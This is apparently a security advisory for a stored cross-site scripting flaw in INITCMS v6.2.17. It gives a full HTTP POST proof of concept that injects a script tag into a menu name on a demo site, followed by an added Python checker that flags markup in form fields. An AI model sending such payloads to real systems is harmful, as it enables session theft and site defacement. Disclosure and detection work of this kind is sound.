INITCMS v6.2.17 - Stored Cross-Site Scripting
INITCMS v6.2.17 contains a stored cross-site scripting (XSS) vulnerability: an attacker can inject script code by saving a malicious menu item.
2025-9-10 19:59:59 Author: cxsecurity.com

# Exploit Title: INITCMS v6.2.17 - Stored Cross-Site Scripting
# Google Dork: N/A
# Date: 2025-09-06 [YYYY/MM/DD]
# Exploit Author: Osman Aydoğan
# Vendor Homepage: initcms.com
# Vulnerable Software --> [ https://github.com/networking/init-cms-bundle/releases/tag/v6.2.17 ]
# Demo Page: https://demo.initcms.com
# Affected Version: [ v6.2.17 ]
# CVE-ID: N/A
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry
# Attack Pattern: <script>alert("OsmanXSS")</script>

# Description

Saving a new menu from the menus tab allows a Cross-Site Scripting payload to run.

# Proof of Concepts:

POST /admin/cms/menu/create?uniqid=s68bc9a3f556f3&subclass=menu%20item HTTP/2
Host: demo.initcms.com
Cookie: PHPSESSID=4740579a48b200d5d131481e1c3242b1; _locale=en
Content-Length: 1430
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: tr-TR,tr;q=0.9
Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Origin: https://demo.initcms.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.initcms.com/admin/cms/menu/list
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[name]"

<script>alert("OsmanXSS")</script>
------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[locale]"

en
------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[page]"

41
------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[redirect_url]"


------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[internal_url]"


------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[visibility]"

public
------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[link_target]"


------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[link_class]"


------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[link_rel]"


------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[menu]"

40
------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf
Content-Disposition: form-data; name="s68bc9a3f556f3[_token]"

f8a2e368078aad7c0522335.dsUFhXi327vaOMPE1b3x1iUQJR7Fxu1_jOacFTkBf9Q.OI5gti3648u-a42bt-Kwm3NyZCq3sKYSu4LDJWhsPZkFgHGxKdma9Y1LsA
------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf--
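
A server-side check for the flaw shown in the request above, as an added example that is not part of the original advisory or the INITCMS code base: it parses a multipart body shaped like the PoC, flags form fields that carry markup, and returns the HTML-encoded value a template should emit instead. The boundary, the shortened sample body, and the names `form_fields` and `audit` are constructed for illustration.

```python
import html
import re
from email import message_from_bytes

# Markup that has no place in a plain-text menu label:
# HTML tags, inline event handlers, javascript: URLs.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-zA-Z][^>]*>|\bon\w+\s*=|javascript\s*:", re.IGNORECASE
)

def form_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: text value}."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    fields = {}
    for part in message_from_bytes(raw).walk():
        name = part.get_param("name", header="content-disposition")
        if name is not None:  # the multipart container itself has no name
            data = part.get_payload(decode=True) or b""
            fields[name] = data.decode("utf-8", "replace").strip()
    return fields

def audit(fields: dict) -> list:
    """Return (field, HTML-encoded value) for every value carrying markup."""
    return [
        (name, html.escape(value, quote=True))
        for name, value in fields.items()
        if SUSPICIOUS.search(value)
    ]

# Constructed sample: three fields in the same shape as the PoC request.
BOUNDARY = "----ConstructedBoundary"
SAMPLE = (
    '--{b}\r\nContent-Disposition: form-data; name="s68bc9a3f556f3[name]"\r\n\r\n'
    '<script>alert("OsmanXSS")</script>\r\n'
    '--{b}\r\nContent-Disposition: form-data; name="s68bc9a3f556f3[locale]"\r\n\r\n'
    'en\r\n'
    '--{b}\r\nContent-Disposition: form-data; name="s68bc9a3f556f3[redirect_url]"\r\n\r\n'
    '\r\n'
    '--{b}--\r\n'
).replace("{b}", BOUNDARY).encode()

if __name__ == "__main__":
    parsed = form_fields("multipart/form-data; boundary=" + BOUNDARY, SAMPLE)
    for field, encoded in audit(parsed):
        print(f"markup in {field}: render as {encoded}")
```

Flagging on input is a detection aid only; the fix for stored XSS is encoding the stored value at every point where it is rendered.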





 



Source: https://cxsecurity.com/issue/WLB-2025090005